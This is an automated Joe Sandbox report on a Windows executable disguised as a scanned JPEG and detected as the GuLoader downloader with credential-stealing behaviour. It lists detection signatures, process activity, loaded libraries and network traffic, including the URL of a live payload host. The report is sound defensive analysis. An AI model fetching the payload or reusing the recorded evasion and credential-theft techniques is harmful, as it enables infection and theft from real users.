Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jpgcamscanner_20240521_0072345_JPEG.bat.exe

Overview

General Information

Sample name:jpgcamscanner_20240521_0072345_JPEG.bat.exe
Analysis ID:1445937
MD5:18776562551c3adcdc9f49c013772fbd
SHA1:ee124b7cd0296b4e524454ab12059b8be60bc002
SHA256:05df6f3430171cb7db9fa5f6782b8f67b14079b6e1dffbb013c33ca91b1ad5d3
Infos:

Detection

GuLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • jpgcamscanner_20240521_0072345_JPEG.bat.exe (PID: 1500 cmdline: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe" MD5: 18776562551C3ADCDC9F49C013772FBD)
    • dllhost.exe (PID: 7232 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.24172966883.0000000033875000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.19322780922.0000000005951000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: jpgcamscanner_20240521_0072345_JPEG.bat.exe PID: 7232JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://veysiseker.com/FOB.binAvira URL Cloud: Label: malware
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeReversingLabs: Detection: 34%
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeJoe Sandbox ML: detected
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_0040626D FindFirstFileA,FindClose,2_2_0040626D
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405732
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_004026FE FindFirstFileA,2_2_004026FE
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_0040626D FindFirstFileA,FindClose,4_2_0040626D
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405732
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_004026FE FindFirstFileA,4_2_004026FE
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
        Source: unknownDNS query: name: ip-api.com
        Source: global trafficHTTP traffic detected: GET /FOB.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: veysiseker.comCache-Control: no-cache
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /FOB.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: veysiseker.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: veysiseker.com
        Source: global trafficDNS traffic detected: DNS query: ip-api.com
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24163498581.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://veysiseker.com/FOB.bin
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004051CF
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004031D6
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004031D6
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_00404A0E2_2_00404A0E
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_004065F62_2_004065F6
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_6DDA1A9C2_2_6DDA1A9C
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_00404A0E4_2_00404A0E
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_004065F64_2_004065F6
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_001589084_2_00158908
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_001549084_2_00154908
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_001581C54_2_001581C5
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_00153CF04_2_00153CF0
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_0015BD004_2_0015BD00
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_001540384_2_00154038
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_0015E73F4_2_0015E73F
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359A3D204_2_359A3D20
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359A1BE04_2_359A1BE0
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359A93664_2_359A9366
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359A5E804_2_359A5E80
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359AA6B84_2_359AA6B8
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359A46E84_2_359A46E8
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359A01284_2_359A0128
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359A64CF4_2_359A64CF
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359A57984_2_359A5798
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_001589C24_2_001589C2
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: String function: 00402ACB appears 48 times
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000002.00000000.19073539033.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerainiers.exe4 vs jpgcamscanner_20240521_0072345_JPEG.bat.exe
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerainiers.exe4 vs jpgcamscanner_20240521_0072345_JPEG.bat.exe
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002FD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs jpgcamscanner_20240521_0072345_JPEG.bat.exe
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeBinary or memory string: OriginalFilenamerainiers.exe4 vs jpgcamscanner_20240521_0072345_JPEG.bat.exe
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@4/18@2/2
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004031D6
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004031D6
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_0040449B
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar,2_2_004020D1
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeMutant created: NULL
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsq45DA.tmpJump to behavior
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeReversingLabs: Detection: 34%
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile read: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess created: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}Jump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: photometadatahandler.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: mfsrcsnk.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: mfplat.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: rtworkq.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000002.00000002.19322780922.0000000005951000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_6DDA1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_6DDA1A9C
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_6DDA2F20 push eax; ret 2_2_6DDA2F4E
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359AB9E3 push FAF8B93Ch; ret 4_2_359AB9E9
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359ABBF6 push FAF8B93Ch; ret 4_2_359ABBFF
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359ABB44 push FAF8B93Ch; ret 4_2_359ABB4D
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359ABA95 push FAF8B93Ch; ret 4_2_359ABA9B
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_359ABAEB push FAF8B93Ch; ret 4_2_359ABAF4
